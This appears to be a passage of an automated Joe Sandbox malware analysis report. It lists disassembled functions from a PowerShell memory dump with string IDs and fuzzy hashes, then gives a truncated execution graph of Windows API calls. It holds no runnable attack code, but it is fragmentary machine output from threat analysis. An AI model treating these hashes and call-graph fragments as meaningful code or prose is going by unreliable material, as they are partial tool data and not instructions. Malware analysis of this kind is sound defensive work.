                                                                                                                                                • Instruction Fuzzy Hash: C7F136B1704256DFDB259B79C85166BFBE2AFC7220F24C07AD806CB251EB31D941C7A1
                                                                                                                                                Function 07C11E60 Relevance: 9.2, Strings: 7, Instructions: 403COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$4'tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-1556618041
                                                                                                                                                • Opcode ID: 3fbc803184fb179d23ca9a115f2fd67a269dfd8aa1af2ff4d7526390ee5a8149
                                                                                                                                                • Instruction ID: 3ecbe4ba66a1614ce6805fc0d9656529b921f8629a45208a2c26f93c2b97858d
                                                                                                                                                • Opcode Fuzzy Hash: 3fbc803184fb179d23ca9a115f2fd67a269dfd8aa1af2ff4d7526390ee5a8149
                                                                                                                                                • Instruction Fuzzy Hash: 33D149B5B0421A9FCB259A79C84066EFBE2BFC7310F24C17AD905CB241EB35D941D7A1
                                                                                                                                                Function 07C1CEBF Relevance: 8.9, Strings: 7, Instructions: 166COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$84"l$d%zq$d%zq$d%zq$tPtq$$tq
                                                                                                                                                • API String ID: 0-2893587698
                                                                                                                                                • Opcode ID: b0c0871057bd14c70bee53c2a9b8b03c9ef08d97d9991c06d4e63915bcd18905
                                                                                                                                                • Instruction ID: db2fd78db423751fb277864c58078a26aa65ffff93a0271d7d0320581cc5d0d7
                                                                                                                                                • Opcode Fuzzy Hash: b0c0871057bd14c70bee53c2a9b8b03c9ef08d97d9991c06d4e63915bcd18905
                                                                                                                                                • Instruction Fuzzy Hash: 2151D7F5B04205EFCB248F29C491B6ABBB1AF46350F2980B5E802AF291D735DD41DB61
                                                                                                                                                Function 07C1DE10 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$84"l$tPtq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-1773754857
                                                                                                                                                • Opcode ID: 85299e295a907d26a7ba8c05bcbfe23cf5fac49b3e872d6c371e48896c074f90
                                                                                                                                                • Instruction ID: 252a669fe8b8df170745f5ac2b1a67e1ba00c65fb012dd01e5fab231290e8d2b
                                                                                                                                                • Opcode Fuzzy Hash: 85299e295a907d26a7ba8c05bcbfe23cf5fac49b3e872d6c371e48896c074f90
                                                                                                                                                • Instruction Fuzzy Hash: 5861C3F0704206DFDB28CE15C580BAAB7B2AF47352F158075EC069B295C735DE90EBA1
                                                                                                                                                Function 07C1D006 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$84"l$d%zq$d%zq$d%zq$tPtq
                                                                                                                                                • API String ID: 0-3727785734
                                                                                                                                                • Opcode ID: 409396c58a52311e29ad6c5e116077c9ad018d7b5db3c143fd8200b305e096a5
                                                                                                                                                • Instruction ID: 1cd2302cf5a624a3c7eee8f7af45fd55822cc1f20dd999c5f480d727739efeea
                                                                                                                                                • Opcode Fuzzy Hash: 409396c58a52311e29ad6c5e116077c9ad018d7b5db3c143fd8200b305e096a5
                                                                                                                                                • Instruction Fuzzy Hash: 8031C4F4B00205DFCB24CF6DC480A5AFBA2BB89710F2581A5E956AF350C732DD42CB61
                                                                                                                                                Function 07C11DC7 Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2864496143
                                                                                                                                                • Opcode ID: 90d1dc358a0a58f9b9be30bec3765ca691388037b755b73f9a7fa734ed308702
                                                                                                                                                • Instruction ID: ebd279c9c006e6a460a3064179afd4bb81a78b7505a57b038a2fcdb31f878100
                                                                                                                                                • Opcode Fuzzy Hash: 90d1dc358a0a58f9b9be30bec3765ca691388037b755b73f9a7fa734ed308702
                                                                                                                                                • Instruction Fuzzy Hash: CA313BF1A0C34E9FCB2606A55854375BBA16F83210F2D81B7DB418B181DB3DC955E362
                                                                                                                                                Function 07C126B1 Relevance: 6.3, Strings: 5, Instructions: 84COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$$tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2113016647
                                                                                                                                                • Opcode ID: 081ee95db2cd36c44c5545ed30cf1989223f24597475a626229a262435543be8
                                                                                                                                                • Instruction ID: 42fed2827a974d34bc0d94d78ce252d784b6e9db5509b1b4bdead653e8cc2a68
                                                                                                                                                • Opcode Fuzzy Hash: 081ee95db2cd36c44c5545ed30cf1989223f24597475a626229a262435543be8
                                                                                                                                                • Instruction Fuzzy Hash: 88218EFD31430AEBDB398E06D9846B7B7A4BF43651F188076E8048B651C735CA80EBE1
                                                                                                                                                Function 07C1C770 Relevance: 5.5, Strings: 4, Instructions: 486COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (otq$(otq$(otq$(otq
                                                                                                                                                • API String ID: 0-2682020920
                                                                                                                                                • Opcode ID: 01e3a271fe10b6e78213d22b11b0cfe8254c2c1dc68788b187677616d15dbea6
                                                                                                                                                • Instruction ID: 1a1671cf8e8f77ece748f316b9e34d570f0102a54cf0033049052cbbb692f497
                                                                                                                                                • Opcode Fuzzy Hash: 01e3a271fe10b6e78213d22b11b0cfe8254c2c1dc68788b187677616d15dbea6
                                                                                                                                                • Instruction Fuzzy Hash: AEF137B1748209DFDB358F69C890BAABBA1AF83310F14C07AF8158B291DB35C951D7B1
                                                                                                                                                Function 07C1E480 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l$4'tq$4'tq
                                                                                                                                                • API String ID: 0-3370351057
                                                                                                                                                • Opcode ID: 67631c80193cefc4c66801f4c6e00da3599d5dd2ea779467d2977e784df89012
                                                                                                                                                • Instruction ID: 21be677a40f8e91fb4bbd5ea3f02763ab211e6c7e5427d73fdc8c5492a274dc4
                                                                                                                                                • Opcode Fuzzy Hash: 67631c80193cefc4c66801f4c6e00da3599d5dd2ea779467d2977e784df89012
                                                                                                                                                • Instruction Fuzzy Hash: 69C1A1F0E00205DFEB24DF55C581A6EBBB2BF86705F148429DC05AF744DB36AD829BA1
                                                                                                                                                Function 07C14C60 Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 84"l$84"l$tPtq$tPtq
                                                                                                                                                • API String ID: 0-3214611704
                                                                                                                                                • Opcode ID: 0a26f09757d14297073f847fd7d242a692ddb5069421937c7ee7f13a0324b040
                                                                                                                                                • Instruction ID: 1771a2cdf0f3741f6d724bc55fc0c6e754a2ca97c1d044e87ca951c71ba9d0c1
                                                                                                                                                • Opcode Fuzzy Hash: 0a26f09757d14297073f847fd7d242a692ddb5069421937c7ee7f13a0324b040
                                                                                                                                                • Instruction Fuzzy Hash: 16915EB17042969FCB289B79C490A7AFBA2AF82310F24C07AD9159F391DB31DF41D761
                                                                                                                                                Function 07C100F0 Relevance: 5.2, Strings: 4, Instructions: 241COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$XY$l$XY$l
                                                                                                                                                • API String ID: 0-3619297104
                                                                                                                                                • Opcode ID: 75dee26d086cbb1f398c510906e6b0777492b93336027b10ad57c5af0dab6868
                                                                                                                                                • Instruction ID: 48b3d92b6a4c02b2f8638f71e4f8397c4dbc1ed83f60239af2c34433549ab18c
                                                                                                                                                • Opcode Fuzzy Hash: 75dee26d086cbb1f398c510906e6b0777492b93336027b10ad57c5af0dab6868
                                                                                                                                                • Instruction Fuzzy Hash: 347119B170824ACFCB159B79D4846AABBA2AFC7211F24C0BBD845CF251DA35C9C1D7A1
                                                                                                                                                Function 07C11070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-173548568
                                                                                                                                                • Opcode ID: e6818f3e410bb154a992fc3ba58f3a94106d8de02d1d5277bad9b7417547f368
                                                                                                                                                • Instruction ID: 19394d87bbab70a75b2900e308b8abc8e6e9302f9b27444edec16cf85906c72e
                                                                                                                                                • Opcode Fuzzy Hash: e6818f3e410bb154a992fc3ba58f3a94106d8de02d1d5277bad9b7417547f368
                                                                                                                                                • Instruction Fuzzy Hash: 1C2137B171424EABDB34497E9881B37E79A9BC6211F38803BAA05DB381DD7DC9419320
                                                                                                                                                Function 07C11C69 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$$tq$$tq
                                                                                                                                                • API String ID: 0-3085001694
                                                                                                                                                • Opcode ID: 51ee4d840979fd5dd0fe92e3aaff5c089fe19287189730b70c4697efa9eb55f4
                                                                                                                                                • Instruction ID: b6f6f2b08067887002c00320c2f8305c318b034bbd40ff655f19f07ff3d58b34
                                                                                                                                                • Opcode Fuzzy Hash: 51ee4d840979fd5dd0fe92e3aaff5c089fe19287189730b70c4697efa9eb55f4
                                                                                                                                                • Instruction Fuzzy Hash: 4D0126B170824A5FC72A426D5830366EF729FC3611F2A40BBC501CF386DE688D12C3A6

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:5.6%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:1.8%
                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                Total number of Limit Nodes:74
                                                                                                                                                execution_graph 40148 441819 40151 430737 40148->40151 40150 441825 40152 430756 40151->40152 40164 43076d 40151->40164 40153 430774 40152->40153 40154 43075f 40152->40154 40166 43034a memcpy 40153->40166 40165 4169a7 11 API calls 40154->40165 40157 4307ce 40158 430819 memset 40157->40158 40167 415b2c 11 API calls 40157->40167 40158->40164 40159 43077e 40159->40157 40162 4307fa 40159->40162 40159->40164 40161 4307e9 40161->40158 40161->40164 40168 4169a7 11 API calls 40162->40168 40164->40150 40165->40164 40166->40159 40167->40161 40168->40164 37547 442ec6 19 API calls 37721 4152c6 malloc 37722 4152e2 37721->37722 37723 4152ef 37721->37723 37725 416760 11 API calls 37723->37725 37725->37722 37726 4466f4 37745 446904 37726->37745 37728 446700 GetModuleHandleA 37731 446710 __set_app_type __p__fmode __p__commode 37728->37731 37730 4467a4 37732 4467ac __setusermatherr 37730->37732 37733 4467b8 37730->37733 37731->37730 37732->37733 37746 4468f0 _controlfp 37733->37746 37735 4467bd _initterm __wgetmainargs _initterm 37736 44681e GetStartupInfoW 37735->37736 37737 446810 37735->37737 37739 446866 GetModuleHandleA 37736->37739 37747 41276d 37739->37747 37743 446896 exit 37744 44689d _cexit 37743->37744 37744->37737 37745->37728 37746->37735 37748 41277d 37747->37748 37790 4044a4 LoadLibraryW 37748->37790 37750 412785 37751 412789 37750->37751 37798 414b81 37750->37798 37751->37743 37751->37744 37754 4127c8 37804 412465 memset ??2@YAPAXI 37754->37804 37756 4127ea 37816 40ac21 37756->37816 37761 412813 37834 40dd07 memset 37761->37834 37762 412827 37839 40db69 memset 37762->37839 37765 412822 37861 4125b6 ??3@YAXPAX DeleteObject 37765->37861 37767 40ada2 _wcsicmp 37768 41283d 37767->37768 37768->37765 37771 412863 CoInitialize 37768->37771 37844 41268e 37768->37844 37770 412966 37862 40b1ab free free 37770->37862 37860 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37771->37860 37775 41296f 37863 40b633 37775->37863 37777 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37782 412957 CoUninitialize 37777->37782 37787 4128ca 37777->37787 37782->37765 37783 4128d0 TranslateAcceleratorW 37784 412941 GetMessageW 37783->37784 37783->37787 37784->37782 37784->37783 37785 412909 IsDialogMessageW 37785->37784 37785->37787 37786 4128fd IsDialogMessageW 37786->37784 37786->37785 37787->37783 37787->37785 37787->37786 37788 41292b TranslateMessage DispatchMessageW 37787->37788 37789 41291f IsDialogMessageW 37787->37789 37788->37784 37789->37784 37789->37788 37791 4044cf GetProcAddress 37790->37791 37795 4044f7 37790->37795 37792 4044e8 FreeLibrary 37791->37792 37794 4044df 37791->37794 37793 4044f3 37792->37793 37792->37795 37793->37795 37794->37792 37796 404507 MessageBoxW 37795->37796 37797 40451e 37795->37797 37796->37750 37797->37750 37799 414b8a 37798->37799 37800 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37798->37800 37867 40a804 memset 37799->37867 37800->37754 37803 414b9e GetProcAddress 37803->37800 37805 4124e0 37804->37805 37806 412505 ??2@YAPAXI 37805->37806 37807 41251c 37806->37807 37809 412521 37806->37809 37889 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37807->37889 37878 444722 37809->37878 37815 41259b wcscpy 37815->37756 37894 40b1ab free free 37816->37894 37820 40ad4b 37829 40ad76 37820->37829 37907 40a9ce 37820->37907 37821 40a9ce malloc memcpy free free 37825 40ac5c 37821->37825 37823 40ace7 free 37823->37825 37825->37820 37825->37821 37825->37823 37825->37829 37898 40a8d0 7 API calls 37825->37898 37899 4099f4 37825->37899 37895 40aa04 37829->37895 37830 40ada2 37831 40adc9 37830->37831 37832 40adaa 37830->37832 37831->37761 37831->37762 37832->37831 37833 40adb3 _wcsicmp 37832->37833 37833->37831 37833->37832 37913 40dce0 37834->37913 37836 40dd3a GetModuleHandleW 37918 40dba7 37836->37918 37840 40dce0 3 API calls 37839->37840 37841 40db99 37840->37841 37990 40dae1 37841->37990 38004 402f3a 37844->38004 37846 412766 37846->37765 37846->37771 37847 4126d3 _wcsicmp 37848 4126a8 37847->37848 37848->37846 37848->37847 37850 41270a 37848->37850 38038 4125f8 7 API calls 37848->38038 37850->37846 38007 411ac5 37850->38007 37860->37777 37861->37770 37862->37775 37864 40b640 37863->37864 37865 40b639 free 37863->37865 37866 40b1ab free free 37864->37866 37865->37864 37866->37751 37868 40a83b GetSystemDirectoryW 37867->37868 37869 40a84c wcscpy 37867->37869 37868->37869 37874 409719 wcslen 37869->37874 37872 40a881 LoadLibraryW 37873 40a886 37872->37873 37873->37800 37873->37803 37875 409724 37874->37875 37876 409739 wcscat LoadLibraryW 37874->37876 37875->37876 37877 40972c wcscat 37875->37877 37876->37872 37876->37873 37877->37876 37879 444732 37878->37879 37880 444728 DeleteObject 37878->37880 37890 409cc3 37879->37890 37880->37879 37882 412551 37883 4010f9 37882->37883 37884 401130 37883->37884 37885 401134 GetModuleHandleW LoadIconW 37884->37885 37886 401107 wcsncat 37884->37886 37887 40a7be 37885->37887 37886->37884 37888 40a7d2 37887->37888 37888->37815 37888->37888 37889->37809 37893 409bfd memset wcscpy 37890->37893 37892 409cdb CreateFontIndirectW 37892->37882 37893->37892 37894->37825 37896 40aa14 37895->37896 37897 40aa0a free 37895->37897 37896->37830 37897->37896 37898->37825 37900 409a41 37899->37900 37901 4099fb malloc 37899->37901 37900->37825 37903 409a37 37901->37903 37904 409a1c 37901->37904 37903->37825 37905 409a30 free 37904->37905 37906 409a20 memcpy 37904->37906 37905->37903 37906->37905 37908 40a9e7 37907->37908 37909 40a9dc free 37907->37909 37910 4099f4 3 API calls 37908->37910 37911 40a9f2 37909->37911 37910->37911 37912 40a8d0 7 API calls 37911->37912 37912->37829 37937 409bca GetModuleFileNameW 37913->37937 37915 40dce6 wcsrchr 37916 40dcf5 37915->37916 37917 40dcf9 wcscat 37915->37917 37916->37917 37917->37836 37938 44db70 37918->37938 37922 40dbfd 37941 4447d9 37922->37941 37925 40dc34 wcscpy wcscpy 37967 40d6f5 37925->37967 37926 40dc1f wcscpy 37926->37925 37929 40d6f5 3 API calls 37930 40dc73 37929->37930 37931 40d6f5 3 API calls 37930->37931 37932 40dc89 37931->37932 37933 40d6f5 3 API calls 37932->37933 37934 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37933->37934 37973 40da80 37934->37973 37937->37915 37939 40dbb4 memset memset 37938->37939 37940 409bca GetModuleFileNameW 37939->37940 37940->37922 37942 4447f4 37941->37942 37943 40dc1b 37942->37943 37944 444807 ??2@YAPAXI 37942->37944 37943->37925 37943->37926 37945 44481f 37944->37945 37946 444873 _snwprintf 37945->37946 37947 4448ab wcscpy 37945->37947 37980 44474a 8 API calls 37946->37980 37949 4448bb 37947->37949 37981 44474a 8 API calls 37949->37981 37951 4448a7 37951->37947 37951->37949 37952 4448cd 37982 44474a 8 API calls 37952->37982 37954 4448e2 37983 44474a 8 API calls 37954->37983 37956 4448f7 37984 44474a 8 API calls 37956->37984 37958 44490c 37985 44474a 8 API calls 37958->37985 37960 444921 37986 44474a 8 API calls 37960->37986 37962 444936 37987 44474a 8 API calls 37962->37987 37964 44494b 37988 44474a 8 API calls 37964->37988 37966 444960 ??3@YAXPAX 37966->37943 37968 44db70 37967->37968 37969 40d702 memset GetPrivateProfileStringW 37968->37969 37970 40d752 37969->37970 37971 40d75c WritePrivateProfileStringW 37969->37971 37970->37971 37972 40d758 37970->37972 37971->37972 37972->37929 37974 44db70 37973->37974 37975 40da8d memset 37974->37975 37976 40daac LoadStringW 37975->37976 37977 40dac6 37976->37977 37977->37976 37979 40dade 37977->37979 37989 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37977->37989 37979->37765 37980->37951 37981->37952 37982->37954 37983->37956 37984->37958 37985->37960 37986->37962 37987->37964 37988->37966 37989->37977 38000 409b98 GetFileAttributesW 37990->38000 37992 40daea 37993 40daef wcscpy wcscpy GetPrivateProfileIntW 37992->37993 37999 40db63 37992->37999 38001 40d65d GetPrivateProfileStringW 37993->38001 37995 40db3e 38002 40d65d GetPrivateProfileStringW 37995->38002 37997 40db4f 38003 40d65d GetPrivateProfileStringW 37997->38003 37999->37767 38000->37992 38001->37995 38002->37997 38003->37999 38039 40eaff 38004->38039 38008 411ae2 memset 38007->38008 38009 411b8f 38007->38009 38080 409bca GetModuleFileNameW 38008->38080 38021 411a8b 38009->38021 38011 411b0a wcsrchr 38012 411b22 wcscat 38011->38012 38013 411b1f 38011->38013 38081 414770 wcscpy wcscpy wcscpy CloseHandle 38012->38081 38013->38012 38015 411b67 38082 402afb 38015->38082 38019 411b7f 38138 40ea13 SendMessageW memset SendMessageW 38019->38138 38022 402afb 27 API calls 38021->38022 38023 411ac0 38022->38023 38024 4110dc 38023->38024 38025 41113e 38024->38025 38030 4110f0 38024->38030 38163 40969c LoadCursorW SetCursor 38025->38163 38027 411143 38164 444a54 38027->38164 38167 4032b4 38027->38167 38028 4110f7 _wcsicmp 38028->38030 38029 411157 38031 40ada2 _wcsicmp 38029->38031 38030->38025 38030->38028 38185 410c46 10 API calls 38030->38185 38034 411167 38031->38034 38032 4111af 38034->38032 38035 4111a6 qsort 38034->38035 38035->38032 38038->37848 38040 40eb10 38039->38040 38053 40e8e0 38040->38053 38043 40eb6c memcpy memcpy 38044 40ebe1 38043->38044 38045 40ebb7 38043->38045 38044->38043 38046 40ebf2 ??2@YAPAXI ??2@YAPAXI 38044->38046 38045->38044 38050 40d134 16 API calls 38045->38050 38047 40ec2e ??2@YAPAXI 38046->38047 38049 40ec65 38046->38049 38047->38049 38063 40ea7f 38049->38063 38050->38045 38052 402f49 38052->37848 38054 40e8f2 38053->38054 38055 40e8eb ??3@YAXPAX 38053->38055 38056 40e900 38054->38056 38057 40e8f9 ??3@YAXPAX 38054->38057 38055->38054 38058 40e911 38056->38058 38059 40e90a ??3@YAXPAX 38056->38059 38057->38056 38060 40e931 ??2@YAPAXI ??2@YAPAXI 38058->38060 38061 40e921 ??3@YAXPAX 38058->38061 38062 40e92a ??3@YAXPAX 38058->38062 38059->38058 38060->38043 38061->38062 38062->38060 38064 40aa04 free 38063->38064 38065 40ea88 38064->38065 38066 40aa04 free 38065->38066 38067 40ea90 38066->38067 38068 40aa04 free 38067->38068 38069 40ea98 38068->38069 38070 40aa04 free 38069->38070 38071 40eaa0 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eab3 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40eabd 38074->38075 38076 40a9ce 4 API calls 38075->38076 38077 40eac7 38076->38077 38078 40a9ce 4 API calls 38077->38078 38079 40ead1 38078->38079 38079->38052 38080->38011 38081->38015 38139 40b2cc 38082->38139 38084 402b0a 38085 40b2cc 27 API calls 38084->38085 38086 402b23 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b3a 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b54 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b6b 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402b82 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402b99 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bb0 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bc7 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402bde 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402bf5 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c0c 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c23 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c3a 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c51 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c68 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402c7f 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402c99 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cb3 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402cd5 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402cf0 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d0b 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d26 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d3e 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d59 38131->38132 38133 40b2cc 27 API calls 38132->38133 38134 402d78 38133->38134 38135 40b2cc 27 API calls 38134->38135 38136 402d93 38135->38136 38137 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38136->38137 38137->38019 38138->38009 38142 40b58d 38139->38142 38141 40b2d1 38141->38084 38143 40b5a4 GetModuleHandleW FindResourceW 38142->38143 38144 40b62e 38142->38144 38145 40b5c2 LoadResource 38143->38145 38147 40b5e7 38143->38147 38144->38141 38146 40b5d0 SizeofResource LockResource 38145->38146 38145->38147 38146->38147 38147->38144 38155 40afcf 38147->38155 38149 40b608 memcpy 38158 40b4d3 memcpy 38149->38158 38151 40b61e 38159 40b3c1 18 API calls 38151->38159 38153 40b626 38160 40b04b 38153->38160 38156 40b04b ??3@YAXPAX 38155->38156 38157 40afd7 ??2@YAPAXI 38156->38157 38157->38149 38158->38151 38159->38153 38161 40b051 ??3@YAXPAX 38160->38161 38162 40b05f 38160->38162 38161->38162 38162->38144 38163->38027 38165 444a64 FreeLibrary 38164->38165 38166 444a83 38164->38166 38165->38166 38166->38029 38168 4032c4 38167->38168 38169 40b633 free 38168->38169 38170 403316 38169->38170 38186 44553b 38170->38186 38174 403480 38384 40368c 15 API calls 38174->38384 38176 403489 38177 40b633 free 38176->38177 38178 403495 38177->38178 38178->38029 38179 4033a9 memset memcpy 38180 4033ec wcscmp 38179->38180 38181 40333c 38179->38181 38180->38181 38181->38174 38181->38179 38181->38180 38382 4028e7 11 API calls 38181->38382 38383 40f508 6 API calls 38181->38383 38183 403421 _wcsicmp 38183->38181 38185->38030 38187 445548 38186->38187 38188 445599 38187->38188 38385 40c768 38187->38385 38190 4455a8 memset 38188->38190 38271 4457f2 38188->38271 38468 403988 38190->38468 38196 4458aa 38198 44594a 38196->38198 38199 4458bb memset memset 38196->38199 38197 445672 38479 403fbe memset memset memset memset memset 38197->38479 38201 4459ed 38198->38201 38202 44595e memset memset 38198->38202 38204 414c2e 14 API calls 38199->38204 38212 445a00 memset memset 38201->38212 38213 445b22 38201->38213 38208 414c2e 14 API calls 38202->38208 38203 4455e5 38203->38197 38216 44560f 38203->38216 38209 4458f9 38204->38209 38205 44557a 38210 44558c 38205->38210 38663 4136c0 CoTaskMemFree 38205->38663 38206 445854 38206->38196 38593 403c9c memset memset memset memset memset 38206->38593 38214 44599c 38208->38214 38215 40b2cc 27 API calls 38209->38215 38452 444b06 38210->38452 38616 414c2e 38212->38616 38219 445bca 38213->38219 38220 445b38 memset memset memset 38213->38220 38226 40b2cc 27 API calls 38214->38226 38227 445909 38215->38227 38229 4087b3 337 API calls 38216->38229 38218 445849 38679 40b1ab free free 38218->38679 38228 445c8b memset memset 38219->38228 38284 445cf0 38219->38284 38232 445bd4 38220->38232 38233 445b98 38220->38233 38234 4459ac 38226->38234 38243 409d1f 6 API calls 38227->38243 38235 414c2e 14 API calls 38228->38235 38244 445621 38229->38244 38230 445585 38664 41366b 